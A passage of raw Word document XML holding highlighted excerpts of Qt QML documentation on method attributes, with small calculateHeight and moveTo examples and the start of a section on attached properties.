          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Text has changed to:"</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text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8"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C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2538" w:name="method-attributes"/>
      <w:bookmarkStart w:id="2539" w:name="_Toc483001084"/>
      <w:bookmarkStart w:id="2540" w:name="_Toc483004055"/>
      <w:bookmarkStart w:id="2541" w:name="_Toc483604419"/>
      <w:bookmarkStart w:id="2542" w:name="_Toc483605639"/>
      <w:bookmarkEnd w:id="2538"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2539"/>
      <w:bookmarkEnd w:id="2540"/>
      <w:bookmarkEnd w:id="2541"/>
      <w:bookmarkEnd w:id="2542"/>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 method of an object type is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function which may be called to perform some processing or trigger further events</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A method </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be connected to a signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that it is automatically invoked whenever the signal is emitted. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2781" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal and Handler Event System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2543" w:name="defining-method-attributes"/>
      <w:bookmarkStart w:id="2544" w:name="_Toc483001085"/>
      <w:bookmarkStart w:id="2545" w:name="_Toc483604420"/>
      <w:bookmarkStart w:id="2546" w:name="_Toc483605640"/>
      <w:bookmarkEnd w:id="2543"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Method Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2544"/>
      <w:bookmarkEnd w:id="2545"/>
      <w:bookmarkEnd w:id="2546"/>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 method may be defined for a type </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by tagging a function of a class which is then </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registered with the QML type system with</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2782" w:anchor="Q_INVOKABLE" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_INVOKABLE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or by </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registering it as a</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2783" w:anchor="Q_SLOT" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_SLOT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the class</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a custom method can be added to an object declaration in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> document with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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&lt;functionName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>([&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameterName</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;[,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&lt;body&gt;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F61260">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methods can be added to a QML type in order to define standalone, reusable blocks of JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61260">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These methods can be invoked either internally or by external objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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F61260">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unlike signals, method parameter types do not have to be declared as they default to the</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61260">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61260">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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576532">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attempting to declare two methods or signals with the same name in the same type block is an error</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">However, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new method may reuse the name of an existing method on the type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. (This should be done with caution, as the existing method may be hidden and become inaccessible.)</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Below is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2784" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a</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calculateHeight()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method that is called when assigning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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value:</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id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rect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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculateHeight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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rect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width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calculateHeight</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8"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C10CB8">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If the method has parameters, they are accessible by name within the method. Below, when the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2785" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is clicked it invokes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moveTo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method which can then refer to the received</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newX</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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newY</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameters to reposition the text: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Item</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MouseArea</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anchors</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fill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parent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onClicked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label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moveTo</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mouse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x</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mouse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y</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Text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id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label</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> moveTo</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newX</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newY</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label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x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newX</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label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y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newY</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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"Move me!"</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AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2547" w:name="attached-properties-and-attached-signal-"/>
      <w:bookmarkStart w:id="2548" w:name="_Toc483001086"/>
      <w:bookmarkStart w:id="2549" w:name="_Toc483004056"/>
      <w:bookmarkStart w:id="2550" w:name="_Toc483604421"/>
      <w:bookmarkStart w:id="2551" w:name="_Toc483605641"/>
      <w:bookmarkEnd w:id="2547"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attached Properties and Attached Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2548"/>
      <w:bookmarkEnd w:id="2549"/>
      <w:bookmarkEnd w:id="2550"/>
      <w:bookmarkEnd w:id="2551"/>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D60FF5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attached properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mechanisms that enable objects to be annotated with extra properties or signal handlers that are otherwise unavailable to the object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In particular, they </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow objects to access properties or signals that are specifically relevant to the individual object</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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A QML type implementation may choose to</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2786" w:anchor="providing-attached-objects-for-data-annotations" w:history="1">
        <w:r w:rsidRPr="00D60FF5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>create an</w:t>
        </w:r>
        <w:r w:rsidRPr="00D60FF5">
          <w:rPr>
            <w:rStyle w:val="apple-converted-space"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r w:rsidRPr="00D60FF5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attaching type</w:t>
        </w:r>
        <w:r w:rsidRPr="00D60FF5">
